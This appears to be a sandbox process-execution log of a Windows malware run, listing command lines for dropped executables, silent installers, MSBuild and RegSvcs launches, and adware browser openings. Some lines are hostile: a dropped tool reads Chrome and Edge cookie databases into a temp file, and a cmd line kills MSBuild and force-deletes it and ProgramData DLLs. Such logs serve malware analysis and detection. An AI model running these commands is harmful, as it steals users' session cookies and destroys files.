"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3508 /prefetch:1
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe
"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\taskeng.exe" -start
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 22436 -ip 22436
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 22436 -s 876
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe" install
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\explorer.exe
C:\Windows\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Windows\SysWOW64\explorer.exe
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im MSBuild.exe /f & timeout /t 6 & del /f /q "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" & del C:\ProgramData\*.dll & exit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\taskkill.exe
taskkill /im MSBuild.exe /f
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\timeout.exe
timeout /t 6
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 22500 -ip 22500
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 22500 -s 1772
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=3476 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\RequiredApplication_1\Cleaner_Installation.exe" -silent=1 -CID=717 -SID=717 -submn=default
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" "--anbfs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" -NonInteractive -NoLogo -ExecutionPolicy AllSigned -Command "C:\Users\Admin\AppData\Local\Temp\AI_B4C2.ps1 -paths 'C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\file_deleter.ps1','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites\aipackagechainer.exe','C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner\prerequisites' -retry_count 10"
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff9bff0dec0,0x7ff9bff0ded0,0x7ff9bff0dee0
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Cleaner\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Cleaner\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Cleaner --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff601129e70,0x7ff601129e80,0x7ff601129e90
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1988 /prefetch:2
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --mojo-platform-channel-handle=1684 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --mojo-platform-channel-handle=2420 /prefetch:1
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --mojo-platform-channel-handle=2036 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Cleaner\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2520 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=gpu-process --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3308 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --mojo-platform-channel-handle=3696 /prefetch:8
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --mojo-platform-channel-handle=2580 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --mojo-platform-channel-handle=3724 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --mojo-platform-channel-handle=3752 /prefetch:8
C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe
"C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1972,16394721954550563776,12373793476283674531,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Cleaner\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw15428_1053975902" --mojo-platform-channel-handle=2580 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7ff9c55e46f8,0x7ff9c55e4708,0x7ff9c55e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4572 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6624 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x1e4,0x1e8,0x1ec,0x198,0x1f0,0x7ff9c55e46f8,0x7ff9c55e4708,0x7ff9c55e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6920 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4956 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6564 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2028,1895636720861251525,16237375324873433640,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2412 /prefetch:3
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\5B5B.exe
C:\Users\Admin\AppData\Local\Temp\5B5B.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff9c55e46f8,0x7ff9c55e4708,0x7ff9c55e4718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
